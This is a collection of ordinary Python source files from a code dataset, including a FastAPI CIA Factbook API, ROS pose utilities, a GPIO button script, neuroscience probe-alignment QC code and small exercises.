+{"seq_id":"505557488","text":"import pandas as pd\nfrom fastapi import FastAPI\n\napp = FastAPI()\n\ncountries = ['Afghanistan', 'Albania', 'Algeria', 'Andorra', 'Angola', 'Antigua-and-Barbuda', 'Egypt', 'Argentina',\n 'Armenia', 'Australia', 'Austria', 'Azerbaijan', 'Bahrain', 'Bangladesh', 'Barbados', 'Belarus', 'Belgium',\n 'Belize', 'Benin', 'Bhutan', 'Bolivia', 'Bosnia-and-Herzegovina', 'Botswana', 'Brazil', 'Brunei',\n 'Bulgaria', 'Burkina-Faso', 'Burundi', 'Cambodia', 'Cameroon', 'Canada', 'Cabo-Verde',\n 'Central-African-Republic', 'Chad', 'Chile', 'China', 'Colombia', 'Comoros', 'Congo-Republic-of-the',\n 'Costa-Rica', \"Cote-d'Ivoire\", 'Croatia', 'Cuba', 'Cyprus', 'Czechia', 'Korea-North',\n 'Congo-Democratic-Republic-of-the', 'Denmark', 'Djibouti', 'Dominica', 'Dominican-Republic', 'Ecuador',\n 'El-Salvador', 'Equatorial-Guinea', 'Eritrea', 'Estonia', 'Eswatini', 'Ethiopia',\n 'Micronesia-Federated-States-of', 'Fiji', 'Finland', 'France', 'Gabon', 'Georgia', 'Germany', 'Ghana',\n 'Greece', 'Greenland', 'Grenada', 'Guatemala', 'Guinea', 'Guinea-Bissau', 'Guyana', 'Haiti', 'Honduras',\n 'Hong-Kong', 'Hungary', 'Iceland', 'India', 'Indonesia', 'Iraq', 'Ireland', 'Iran', 'Israel', 'Italy',\n 'Jamaica', 'Japan', 'Jordan', 'Kazakhstan', 'Kenya', 'Kiribati', 'Kosovo', 'Kuwait', 'Kyrgyzstan', 'Laos',\n 'Latvia', 'Lebanon', 'Lesotho', 'Liberia', 'Libya', 'Liechtenstein', 'Lithuania', 'Luxembourg', 'Macau',\n 'Madagascar', 'Malawi', 'Malaysia', 'Maldives', 'Mali', 'Malta', 'Marshall-Islands', 'Mauritania',\n 'Mauritius', 'Mexico', 'Moldova', 'Monaco', 'Mongolia', 'Montenegro', 'Morocco', 'Mozambique', 'Burma',\n 'Namibia', 'Nauru', 'Nepal', 'Netherlands', 'New-Zealand', 'Nicaragua', 'Niger', 'Nigeria',\n 'North-Macedonia', 'Norway', 'Oman', 'Pakistan', 'Palau', 'Panama', 'Papua-New-Guinea', 'Paraguay', 'Peru',\n 'Philippines', 'Poland', 'Portugal', 'Qatar', 'Venezuela', 'Korea-South', 'Yemen', 'Romania', 'Russia',\n 'Rwanda', 'Saint-Kitts-and-Nevis', 'Saint-Lucia', 'Saint-Vincent-and-the-Grenadines', 'Samoa',\n 'San-Marino', 'Sao-Tome-and-Principe', 'Saudi-Arabia', 'Senegal', 'Serbia', 'Seychelles', 'Sierra-Leone',\n 'Singapore', 'Slovakia', 'Slovenia', 'Solomon-Islands', 'Somalia', 'South-Africa', 'South-Sudan', 'Spain',\n 'Sri-Lanka', 'Sudan', 'Suriname', 'Sweden', 'Switzerland', 'Syria', 'Taiwan', 'Tajikistan', 'Tanzania',\n 'Thailand', 'Bahamas-The', 'Gambia-The', 'Timor-Leste', 'Togo', 'Tonga', 'Trinidad-and-Tobago', 'Tunisia',\n 'Turkey', 'Turkmenistan', 'Tuvalu', 'Uganda', 'Ukraine', 'United-Arab-Emirates', 'United-Kingdom',\n 'United-States', 'Uruguay', 'Uzbekistan', 'Vanuatu', 'Vietnam', 'West-Bank', 'Mauritania', 'Zambia',\n 'Zimbabwe']\n\nfields = ['country_comparison_infant_mortality_rate', 'crude_oil_production', 'exports',\n 'broadband_fixed_subscriptions', 'budget_surplus_deficit',\n 'carbon_dioxide_emissions_from_consumption_of_energy', 'country_comparison_airports',\n 'country_comparison_area', 'country_comparison_birth_rate',\n 'country_comparison_children_under_the_age_of_5_years_underweight', 'country_comparison_death_rate',\n 'country_comparison_education_expenditures', 'country_comparison_hiv_aids_adult_prevalence_rate',\n 'country_comparison_hiv_aids_deaths', 'country_comparison_hiv_aids_people_living_with_hiv_aids',\n 'gdp_per_capita', 'gdp_real_growth_rate', 'gross_national_saving', 'imports',\n 'industrial_production_growth_rate', 'inflation_rate', 'internet_users', 'labor_force',\n 'natural_gas_consumption', 'natural_gas_exports', 'natural_gas_imports', 
'natural_gas_production',\n 'natural_gas_proved_reserves', 'public_debt', 'refined_petroleum_products_consumption',\n 'refined_petroleum_products_exports', 'refined_petroleum_products_imports',\n 'refined_petroleum_products_production', 'reserves_of_foreign_exchange_and_gold', 'taxes_and_other_revenues',\n 'telephones_fixed_lines', 'telephones_mobile_cellular', 'unemployment_rate', 'crude_oil_proved_reserves',\n 'current_account_balance', 'debt_external', 'electricity_consumption', 'electricity_exports',\n 'electricity_from_fossil_fuels', 'electricity_from_hydroelectric_plants', 'electricity_from_nuclear_fuels',\n 'electricity_from_other_renewable_sources', 'electricity_imports',\n 'electricity_installed_generating_capacity', 'electricity_production',\n 'country_comparison_life_expectancy_at_birth', 'country_comparison_maternal_mortality_rate',\n 'country_comparison_median_age', 'country_comparison_merchant_marine',\n 'country_comparison_military_expenditures', 'country_comparison_net_migration_rate',\n 'country_comparison_obesity_adult_prevalence_rate', 'country_comparison_population',\n 'country_comparison_population_growth_rate', 'country_comparison_railways', 'country_comparison_roadways',\n 'country_comparison_total_fertility_rate', 'country_comparison_unemployment_youth_ages_15_24',\n 'country_comparison_waterways', 'crude_oil_exports', 'crude_oil_imports']\n\ndf = pd.read_csv(\"./cia-factbook.csv\")\n\n\n@app.get(\"/\")\nasync def root():\n \"\"\"\n\n :return: welcoming page returning Made by @woosal1337\n \"\"\"\n try:\n return {f\"Made by @woosal1337\"}\n\n except Exception as e:\n return {f\"{e} has happened!\"}\n\n\n@app.get(\"/country\")\nasync def all_countries():\n \"\"\"\n\n :return: list all the available `country` name values\n \"\"\"\n try:\n return countries\n\n except Exception as e:\n return {f\"{e} has happened!\"}\n\n\n@app.get(\"/field\")\nasync def all_fields():\n \"\"\"\n\n :return: list all of the available `field` name values\n \"\"\"\n try:\n return fields\n\n except Exception as e:\n return {f\"{e} has happened!\"}\n\n\n@app.get(\"/country/{country}\")\nasync def read_item(country: str):\n \"\"\"\n\n :param country:\n :return: all of the field values according to the corresponding country\n \"\"\"\n try:\n\n if country not in countries:\n return {\n f\"{country} is not in the list! Go to `/country' to find the full list of all the available countries!\"}\n\n res = {}\n\n for i in df.columns[1:]:\n column_value = float(df[df['country'] == f'{country}'][f'{i}'])\n\n if pd.isnull(column_value):\n res[i] = \"NAN\"\n else:\n res[i] = column_value\n\n return res\n\n except Exception as e:\n return {f\"{e} has happened!\"}\n\n\n@app.get(\"/field/{field}\")\nasync def return_field_values(field: str):\n \"\"\"\n\n :param field:\n :return: dictionary zipped with countries and their according field values\n \"\"\"\n try:\n\n if field not in fields:\n return {\n f\"{field} is not in the list! Go to `/field' to find the full list of all the available fields!\"}\n\n a = [\"NAN\" if pd.isnull(i) else i for i in df[f\"{field}\"]]\n\n return dict(zip(countries, a))\n\n except Exception as e:\n return {f\"{e} has happened!\"}\n","sub_path":"api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
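To serve the endpoints above, the app is typically run under an ASGI server; a sketch assuming `uvicorn` is installed alongside FastAPI (host and port are illustrative):

```python
# Equivalent to running `uvicorn main:app` from the shell; expects the
# FastAPI module above to be saved as main.py next to cia-factbook.csv.
import uvicorn

if __name__ == "__main__":
    uvicorn.run("main:app", host="127.0.0.1", port=8000)
```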
+{"seq_id":"450334092","text":"from django.shortcuts import render\nfrom .models import Student, Dojo\n\n# Create your views here.\ndef index(request):\n context = {\n 'all_dojos': Dojo.objects.all(),\n 'all_students': Student.objects.all()\n }\n return render(request, 'index.html', context)","sub_path":"lectures/Python/django/django_orm/first_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"180640988","text":"from geometry_msgs.msg import PoseStamped ,Pose, Point, Quaternion, TransformStamped\nfrom tf.transformations import quaternion_multiply, quaternion_inverse, quaternion_matrix\nimport tf\nimport rospy\nimport numpy as np\n\ndef frame_transformation(parent_frame_id, child_frame_id):\n \"\"\" Returns geometry_msgs.msg.Pose\n Retrive the relative transformation pose from parent to child\n \"\"\"\n listener = tf.TransformListener()\n rate = rospy.Rate(10.0)\n while not rospy.is_shutdown():\n try:\n (trans,rot) = listener.lookupTransform(parent_frame_id, child_frame_id, rospy.Time(0))\n return Pose(Point(trans[0],trans[1],trans[2]), Quaternion(rot[0],rot[1],rot[2],rot[3]))\n except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n continue\n rate.sleep()\n\n\ndef transform_pose(source_pose, source_frame, target_frame):\n \"\"\" Returns geometry_msgs.msg.Pose\n Transform the pose into another frame's perspective\n \"\"\"\n pose_stamped = PoseStamped()\n pose_stamped.pose = source_pose\n pose_stamped.header.frame_id = source_frame\n listener = tf.TransformListener()\n rate = rospy.Rate(10.0)\n while not rospy.is_shutdown():\n try:\n target_pose = listener.transformPose(target_frame=target_frame,ps=pose_stamped)\n return target_pose.pose\n except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n continue\n rate.sleep()\n\ndef relative_pose(pose1, pose2):\n \"\"\" Returns geometry_msgs.msg.Pose\n Compute relative pose from pose1 to pose2\n pose1 and pose2 are two poses measured from world frame\n \"\"\"\n # Relative translation: p1 = R^0_1 * p0 + d^0_1\n q1_inv = quaternion_inverse([pose1.orientation.x, pose1.orientation.y,\\\n pose1.orientation.z, pose1.orientation.w])\n T1_inv = quaternion_matrix(q1_inv)\n T1_inv[:3,3] = [-pose1.position.x, -pose1.position.y, -pose1.position.z]\n p2 = np.array([pose2.position.x, pose2.position.y, pose2.position.z, 1.0])\n p_res = T1_inv.dot(p2)\n\n # Relative rotation\n q2 = [pose2.orientation.x,pose2.orientation.y,pose2.orientation.y,pose2.orientation.w]\n q_res = quaternion_multiply(q1_inv, q2)\n\n result = Pose(Point(p_res[0],p_res[1], p_res[2]), Quaternion(q_res[0], q_res[1], q_res[2], q_res[3]))\n return result\n","sub_path":"roganized_grasping/src/roganized_grasping/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"425390386","text":"#!/usr/bin/env python\n\"\"\"Read button.\n\nMake gpio input and enable pull-up resistor.\n\"\"\"\n\nimport os\nimport sys\n\nif not os.getegid() == 0:\n sys.exit('Script must be run as root')\n\nfrom time import sleep\nfrom pyA20.gpio import gpio\nfrom pyA20.gpio import connector\nfrom pyA20.gpio import port\n\n__author__ = \"Stefan Mavrodiev\"\n__copyright__ = \"Copyright 2014, Olimex LTD\"\n__credits__ = [\"Stefan Mavrodiev\"]\n__license__ = \"GPL\"\n__version__ = \"2.0\"\n__maintainer__ = __author__\n__email__ = \"support@olimex.com\"\n\n#led = port.STATUS_LED\nled = port.PA13\n#button = port.PL3\nbutton = port.PG11\n\n\"\"\"Init gpio module\"\"\"\ngpio.init()\n\n\"\"\"Set directions\"\"\"\ngpio.setcfg(led, gpio.OUTPUT)\ngpio.setcfg(button, gpio.INPUT)\n\n\"\"\"Enable pullup resistor\"\"\"\ngpio.pullup(button, gpio.PULLUP)\n#gpio.pullup(button, gpio.PULLDOWN) # Optionally you can use pull-down resistor\nstate =1\nvalue_out = 1\ntry:\n print (\"Press CTRL+C to exit\")\n while True:\n \"\"\"Since we use pull-up the logic will be inverted\"\"\"\n gpio.output(led, value_out)\n print (\"led out value is %d\" %value_out)\n #if value_out == 1:\tvalue_out = 0\n #else :\tvalue_out = 1\n sleep(0.1)\n state = gpio.input(button) # Read button state\n if state:\n value_out = 1;\n else:\n value_out = 0;\n print (\"get button state is %d\" %state)\n sleep(0.1)\n \n \n\nexcept KeyboardInterrupt:\n print (\"Goodbye.\")\n","sub_path":"python/read_key_PL3.py","file_name":"read_key_PL3.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"157778422","text":"from Procedure import pre_process, feedback, gather_info\nfrom Handling import controls\nfrom Strategy import strategy\nfrom Util import U\n# import time\n\n\ndef Process(s, game, version=3):\n\n # t0 = time.time()\n\n pre_process(s, game)\n gather_info(s)\n strategy(s)\n controls(s)\n feedback(s)\n\n # if not s.counter % 50:\n # print(1 / 60 - (time.time() - t0))\n\n return output(s, version)\n\n\ndef output(s, version):\n if version == 2:\n\n if s.roll != 0 and s.counter % 3 == 1 and abs(s.r) > .04:\n s.yaw = s.roll\n s.powerslide = 1\n\n if s.poG:\n s.yaw = s.steer\n\n return [int((s.yaw + 1) * U / 2), int((s.pitch + 1) * U / 2), int(s.throttle * U),\n int(-s.throttle * U), s.jump, s.boost, s.powerslide]\n\n else:\n\n return [s.throttle, s.steer, s.pitch, s.yaw, s.roll, s.jump, s.boost, s.powerslide]\n","sub_path":"agents/RashBot/Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"503035902","text":"import logging\r\nfrom ibllib.atlas import AllenAtlas\r\nfrom ibllib.atlas.regions import BrainRegions\r\nfrom ibllib.pipes import histology\r\nfrom ibllib.ephys.neuropixel import SITES_COORDINATES\r\nimport numpy as np\r\nfrom ibllib.pipes.ephys_alignment import EphysAlignment\r\nfrom ibllib.qc import base\r\nfrom oneibl.patcher import FTPPatcher\r\nfrom ibllib.qc.base import CRITERIA as CRITERIA_BASE\r\n\r\n_log = logging.getLogger('ibllib')\r\nCRITERIA = {\"PASS\": 0.8}\r\n\r\n\r\nclass AlignmentQC(base.QC):\r\n \"\"\"\r\n Class that is used to update the extended_qc of the probe insertion fields with the results\r\n from the ephys alignment procedure\r\n \"\"\"\r\n def __init__(self, probe_id, one=None, brain_atlas=None, channels=True):\r\n super().__init__(probe_id, one=one, log=_log, endpoint='insertions')\r\n\r\n # Data\r\n self.alignments = None\r\n self.xyz_picks = None\r\n self.depths = None\r\n self.cluster_chns = None\r\n self.align_keys_sorted = None\r\n\r\n # Metrics and passed trials\r\n self.sim_matrix = None\r\n self.criteria = CRITERIA\r\n\r\n # Get the brain atlas\r\n self.brain_atlas = brain_atlas or AllenAtlas(25)\r\n # Flag for uploading channels to alyx. For testing purposes\r\n self.channels = channels\r\n\r\n self.insertion = self.one.alyx.rest('insertions', 'read', id=self.eid)\r\n self.resolved = (self.insertion.get('json', {'temp': 0}).get('extended_qc').\r\n get('alignment_resolved', False))\r\n\r\n def load_data(self, prev_alignments=None, xyz_picks=None, depths=None, cluster_chns=None):\r\n \"\"\"\"\r\n Load data required to assess alignment qc and compute similarity matrix. If no arguments\r\n are given load_data will fetch all the relevant data required\r\n \"\"\"\r\n if not np.any(prev_alignments):\r\n aligned_traj = self.one.alyx.rest('trajectories', 'list', probe_insertion=self.eid,\r\n provenance='Ephys aligned histology track')\r\n if len(aligned_traj) > 0:\r\n self.alignments = aligned_traj[0].get('json', {})\r\n else:\r\n self.alignments = {}\r\n return\r\n else:\r\n self.alignments = prev_alignments\r\n\r\n align_keys = [*self.alignments.keys()]\r\n self.align_keys_sorted = sorted(align_keys, reverse=True)\r\n\r\n if len(self.alignments) < 2:\r\n return\r\n\r\n if not np.any(xyz_picks):\r\n self.xyz_picks = np.array(self.insertion['json']['xyz_picks']) / 1e6\r\n else:\r\n self.xyz_picks = xyz_picks\r\n\r\n if not np.any(depths):\r\n self.depths = SITES_COORDINATES[:, 1]\r\n else:\r\n self.depths = depths\r\n\r\n if not np.any(cluster_chns):\r\n _ = self.one.load(self.insertion['session'], dataset_types='clusters.channels',\r\n download_only=True)\r\n self.cluster_chns = np.load(self.one.path_from_eid(self.insertion['session']).\r\n joinpath('alf', self.insertion['name'],\r\n 'clusters.channels.npy'))\r\n else:\r\n self.cluster_chns = cluster_chns\r\n\r\n def compute(self):\r\n \"\"\"\r\n Computes the similarity matrix if > 2 alignments. 
If no data loaded, wraps around load_data\r\n to get all relevant data needed\r\n \"\"\"\r\n\r\n if self.alignments is None:\r\n self.load_data()\r\n\r\n if len(self.alignments) < 2:\r\n self.log.info(f\"Insertion {self.eid}: One or less alignment found...\")\r\n self.sim_matrix = np.array([len(self.alignments)])\r\n else:\r\n self.log.info(f\"Insertion {self.eid}: Running QC on alignment data...\")\r\n self.sim_matrix = self.compute_similarity_matrix()\r\n\r\n return self.sim_matrix\r\n\r\n def run(self, update=True, upload_alyx=True, upload_flatiron=True):\r\n \"\"\"\r\n Compute alignment_qc for a specified probe insertion and updates extended qc field in alyx.\r\n If alignment is resolved and upload flags set to True channels from resolved\r\n alignment will be updated to alyx and datasets sent to ibl-ftp-patcher to be uploaded to\r\n flatiron\r\n \"\"\"\r\n if self.sim_matrix is None:\r\n self.compute()\r\n\r\n # Case where the alignment has already been resolved\r\n if self.resolved:\r\n self.log.info(f\"Alignment for insertion {self.eid} already resolved, channels won't be\"\r\n f\" updated. To force update of channels use \"\r\n f\"resolve_manual method with force=True\")\r\n results = {'alignment_count': len(self.alignments)}\r\n if update:\r\n self.update_extended_qc(results)\r\n results.update({'alignment_resolved': True})\r\n\r\n # Case where no alignments have been made\r\n elif np.all(self.sim_matrix == 0) and self.sim_matrix.shape[0] == 1:\r\n # We don't update database\r\n results = {'alignment_resolved': False}\r\n\r\n # Case where only one alignment\r\n elif np.all(self.sim_matrix == 1) and self.sim_matrix.shape[0] == 1:\r\n results = {'alignment_count': len(self.alignments),\r\n 'alignment_stored': self.align_keys_sorted[0],\r\n 'alignment_resolved': False}\r\n if update:\r\n self.update_extended_qc(results)\r\n\r\n # Case where 2 or more alignments and alignments haven't been resolved\r\n else:\r\n results = self.compute_alignment_status()\r\n\r\n if update:\r\n self.update_extended_qc(results)\r\n\r\n if results['alignment_resolved'] and (upload_alyx or upload_flatiron):\r\n self.upload_channels(results['alignment_stored'], upload_alyx, upload_flatiron)\r\n\r\n return results\r\n\r\n def resolve_manual(self, align_key, update=True, upload_alyx=True, upload_flatiron=True,\r\n force=False):\r\n \"\"\"\r\n Method to manually resolve the alignment of a probe insertion with a given alignment\r\n regardless of the number of alignments or the alignment qc value. Channels from specified\r\n alignment will be uploaded to alyx and datasets sent to ibl-ftp-patcher to be uploaded to\r\n flatiron. If alignment already resolved will only upload if force flag set to True\r\n \"\"\"\r\n\r\n if self.sim_matrix is None:\r\n self.compute()\r\n assert align_key in self.align_keys_sorted, 'align key not recognised'\r\n\r\n if self.resolved == 1 and not force:\r\n self.log.info(f\"Alignment for insertion {self.eid} already resolved, channels won't be\"\r\n f\"updated. 
To overwrite stored channels with alignment {align_key} \"\r\n f\"set 'force=True'\")\r\n file_paths = []\r\n else:\r\n results = self.compute_alignment_status()\r\n results['alignment_resolved'] = True\r\n results['alignment_stored'] = align_key\r\n results['alignment_resolved_by'] = 'experimenter'\r\n\r\n if update:\r\n self.update_extended_qc(results)\r\n file_paths = []\r\n\r\n if upload_alyx or upload_flatiron:\r\n file_paths = self.upload_channels(align_key, upload_alyx, upload_flatiron)\r\n\r\n return file_paths\r\n\r\n def compute_similarity_matrix(self):\r\n \"\"\"\r\n Computes the similarity matrix between each alignment stored in the ephys aligned\r\n trajectory. Similarity matrix based on number of clusters that share brain region and\r\n parent brain region\r\n \"\"\"\r\n\r\n r = BrainRegions()\r\n\r\n clusters = dict()\r\n for iK, key in enumerate(self.align_keys_sorted):\r\n # Location of reference lines used for alignment\r\n feature = np.array(self.alignments[key][0])\r\n track = np.array(self.alignments[key][1])\r\n\r\n # Instantiate EphysAlignment object\r\n ephysalign = EphysAlignment(self.xyz_picks, self.depths, track_prev=track,\r\n feature_prev=feature,\r\n brain_atlas=self.brain_atlas)\r\n\r\n # Find xyz location of all channels\r\n xyz_channels = ephysalign.get_channel_locations(feature, track)\r\n brain_regions = ephysalign.get_brain_locations(xyz_channels)\r\n\r\n # Find the location of clusters along the alignment\r\n cluster_info = dict()\r\n cluster_info['brain_id'] = brain_regions['id'][self.cluster_chns]\r\n cluster_info['parent_id'] = r.get(ids=cluster_info['brain_id']).parent.astype(int)\r\n clusters.update({key: cluster_info})\r\n\r\n sim_matrix = np.zeros((len(self.align_keys_sorted), len(self.align_keys_sorted)))\r\n\r\n for ik, key in enumerate(self.align_keys_sorted):\r\n for ikk, key2 in enumerate(self.align_keys_sorted):\r\n same_id = np.where(clusters[key]['brain_id'] == clusters[key2]['brain_id'])[0]\r\n not_same_id = \\\r\n np.where(clusters[key]['brain_id'] != clusters[key2]['brain_id'])[0]\r\n same_parent = np.where(clusters[key]['parent_id'][not_same_id] ==\r\n clusters[key2]['parent_id'][not_same_id])[0]\r\n sim_matrix[ik, ikk] = len(same_id) + (len(same_parent) * 0.5)\r\n # Normalise\r\n sim_matrix_norm = sim_matrix / np.max(sim_matrix)\r\n\r\n return sim_matrix_norm\r\n\r\n def compute_alignment_status(self):\r\n \"\"\"\r\n Determine whether alignments agree based on value in similarity matrix. 
If any alignments\r\n have similarity of 0.8 set the alignment to be resolved\r\n \"\"\"\r\n # Set diagonals to zero so we don't use those to find max\r\n np.fill_diagonal(self.sim_matrix, 0)\r\n # self.sim_matrix[self.sim_matrix == 1] = 0\r\n max_sim = np.max(self.sim_matrix)\r\n\r\n results = {'alignment_qc': max_sim,\r\n 'alignment_count': self.sim_matrix.shape[0]}\r\n\r\n if max_sim > CRITERIA['PASS']:\r\n location = np.where(self.sim_matrix == max_sim)\r\n results.update({'alignment_stored': self.align_keys_sorted[np.min(location)]})\r\n results.update({'alignment_resolved': True})\r\n results.update({'alignment_resolved_by': 'qc'})\r\n\r\n # outcome = 'PASS'\r\n\r\n else:\r\n results.update({'alignment_stored': self.align_keys_sorted[0]})\r\n results.update({'alignment_resolved': False})\r\n\r\n # outcome = 'WARNING'\r\n\r\n return results\r\n\r\n def upload_channels(self, alignment_key, upload_alyx, upload_flatiron):\r\n \"\"\"\r\n Upload channels to alyx and flatiron based on the alignment specified by the alignment key\r\n \"\"\"\r\n\r\n feature = np.array(self.alignments[alignment_key][0])\r\n track = np.array(self.alignments[alignment_key][1])\r\n ephysalign = EphysAlignment(self.xyz_picks, self.depths,\r\n track_prev=track,\r\n feature_prev=feature,\r\n brain_atlas=self.brain_atlas)\r\n\r\n # Find the channels\r\n channels_mlapdv = np.int32(ephysalign.get_channel_locations(feature, track) * 1e6)\r\n channels_brainID = ephysalign.get_brain_locations(channels_mlapdv / 1e6)['id']\r\n\r\n # Find the clusters\r\n r = BrainRegions()\r\n clusters_mlapdv = channels_mlapdv[self.cluster_chns]\r\n clusters_brainID = channels_brainID[self.cluster_chns]\r\n clusters_brainAcro = r.get(ids=clusters_brainID).acronym\r\n\r\n # upload datasets to flatiron\r\n files_to_register = []\r\n if upload_flatiron:\r\n ftp_patcher = FTPPatcher(one=self.one)\r\n insertion = self.one.alyx.rest('insertions', 'read', id=self.eid)\r\n alf_path = self.one.path_from_eid(insertion['session']).joinpath('alf',\r\n insertion['name'])\r\n alf_path.mkdir(exist_ok=True, parents=True)\r\n\r\n # Make the channels.mlapdv dataset\r\n f_name = alf_path.joinpath('channels.mlapdv.npy')\r\n np.save(f_name, channels_mlapdv)\r\n files_to_register.append(f_name)\r\n\r\n # Make the channels.brainLocationIds dataset\r\n f_name = alf_path.joinpath('channels.brainLocationIds_ccf_2017.npy')\r\n np.save(f_name, channels_brainID)\r\n files_to_register.append(f_name)\r\n\r\n # Make the clusters.mlapdv dataset\r\n f_name = alf_path.joinpath('clusters.mlapdv.npy')\r\n np.save(f_name, clusters_mlapdv)\r\n files_to_register.append(f_name)\r\n\r\n # Make the clusters.brainLocationIds dataset\r\n f_name = alf_path.joinpath('clusters.brainLocationIds_ccf_2017.npy')\r\n np.save(f_name, clusters_brainID)\r\n files_to_register.append(f_name)\r\n\r\n # Make the clusters.brainLocationAcronym dataset\r\n f_name = alf_path.joinpath('clusters.brainLocationAcronyms_ccf_2017.npy')\r\n np.save(f_name, clusters_brainAcro)\r\n files_to_register.append(f_name)\r\n\r\n self.log.info(\"Writing datasets to FlatIron\")\r\n ftp_patcher.create_dataset(path=files_to_register, created_by=self.one._par.ALYX_LOGIN)\r\n\r\n # Need to change channels stored on alyx as well as the stored key is not the same as the\r\n # latest key\r\n if upload_alyx:\r\n if alignment_key != self.align_keys_sorted[0]:\r\n histology.register_aligned_track(self.eid, channels_mlapdv / 1e6,\r\n chn_coords=SITES_COORDINATES, one=self.one,\r\n overwrite=True, channels=self.channels)\r\n\r\n 
ephys_traj = self.one.alyx.rest('trajectories', 'list', probe_insertion=self.eid,\r\n provenance='Ephys aligned histology track')\r\n patch_dict = {'json': self.alignments}\r\n self.one.alyx.rest('trajectories', 'partial_update', id=ephys_traj[0]['id'],\r\n data=patch_dict)\r\n\r\n return files_to_register\r\n\r\n def update_experimenter_evaluation(self, prev_alignments=None, override=False):\r\n\r\n if not np.any(prev_alignments) and not np.any(self.alignments):\r\n aligned_traj = self.one.alyx.rest('trajectories', 'list', probe_insertion=self.eid,\r\n provenance='Ephys aligned histology track')\r\n if len(aligned_traj) > 0:\r\n self.alignments = aligned_traj[0].get('json', {})\r\n else:\r\n self.alignments = {}\r\n return\r\n else:\r\n self.alignments = prev_alignments\r\n\r\n outcomes = [align[2].split(':')[0] for key, align in self.alignments.items()\r\n if len(align) == 3]\r\n if len(outcomes) > 0:\r\n vals = [CRITERIA_BASE[out] for out in outcomes]\r\n max_qc = np.argmax(vals)\r\n outcome = outcomes[max_qc]\r\n self.update(outcome, namespace='experimenter', override=override)\r\n else:\r\n self.log.warning(f'No experimenter qc found, qc field of probe insertion {self.eid} '\r\n f'will not be updated')\r\n","sub_path":"ibllib/qc/alignment_qc.py","file_name":"alignment_qc.py","file_ext":"py","file_size_in_byte":15629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
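A note on the scoring above: compute_similarity_matrix gives a pair of alignments 1.0 for every cluster assigned to the same brain region and 0.5 for a cluster that only shares the parent region, then normalises by the matrix maximum. A minimal self-contained sketch on made-up cluster IDs (the 0.8 threshold stands in for CRITERIA['PASS']):

# Toy version of the similarity score: same region counts 1.0, same parent
# region only counts 0.5. All IDs below are invented for the example.
import numpy as np

clusters = {
    "2020-01-01_user1": {"brain_id": np.array([10, 11, 12, 13]),
                         "parent_id": np.array([1, 1, 2, 2])},
    "2020-01-02_user2": {"brain_id": np.array([10, 11, 14, 13]),
                         "parent_id": np.array([1, 1, 2, 2])},
}
keys = sorted(clusters)
sim = np.zeros((len(keys), len(keys)))
for i, k1 in enumerate(keys):
    for j, k2 in enumerate(keys):
        same = clusters[k1]["brain_id"] == clusters[k2]["brain_id"]
        same_parent = (~same) & (clusters[k1]["parent_id"] ==
                                 clusters[k2]["parent_id"])
        sim[i, j] = same.sum() + 0.5 * same_parent.sum()
sim /= sim.max()
np.fill_diagonal(sim, 0)  # as in compute_alignment_status()
print(sim.max() > 0.8)    # True -> the alignment would be resolved by qc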
+{"seq_id":"105004364","text":"\"\"\"\n=================== TASK 2 ====================\n* Name: Product Of Digits\n*\n* Write a script that will take an input from user\n* as integer number and display product of digits\n* for a given number. Consider that user will always\n* provide integer number.\n*\n* Note: Please describe in details possible cases\n* in which your solution might not work.\n===================================================\n\"\"\"\n\ndef pro_digits(number):\n\n # Chek if passed number is integer\n if not isinstance(number, int):\n return -1\n\n\n digit_pro = 1\n\n\n\n\n while number > 1:\n digit = number % 10\n number = number // 10\n digit_pro *= digit\n\n return digit_pro\n\n\ndef main():\n\n int_number = 1234\n digit_pro = pro_digits(int_number)\n print(\"Pro of digits for given numbers is: \", digit_pro)\n\nmain()\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"248230404","text":"from z3 import *\n\nA_version = [0, 0, 0, 0, 0]\nA = [1, -1, -1, -1, -1]\npath_cond = []\nsym_store = {}\n\ndef getSymVariable(var, idx, version):\n\n var_name = str(var) +\"_\"+ str(idx)+\"_v\" + str(version)\n\n if(var_name not in sym_store.keys()):\n sym_store[var_name] = Int(var_name)\n\n return sym_store[var_name]\n\n\ndef ssa(A):\n\n for i in range(0, len(A)-1):\n if(A[i]>0):\n path_cond.append(getSymVariable(\"A\", i, A_version[i])>0)\n A[i+1] = -1*A[i+1]\n path_cond.append(getSymVariable(\"A\", i+1, A_version[i+1]+1) == -1*getSymVariable(\"A\", i+1, A_version[i+1]))\n A_version[i+1]+=1\n\n\n\n else:\n break\n\n\n\nssa(A)\n\nfor i in range(0, len(path_cond)):\n print(path_cond[i])\n\n\n\nsolve(path_cond)\n\n","sub_path":"Spring2018/Charitha-Xstressor/benchmarks/ssa_example/tests/ssa_exp.py","file_name":"ssa_exp.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
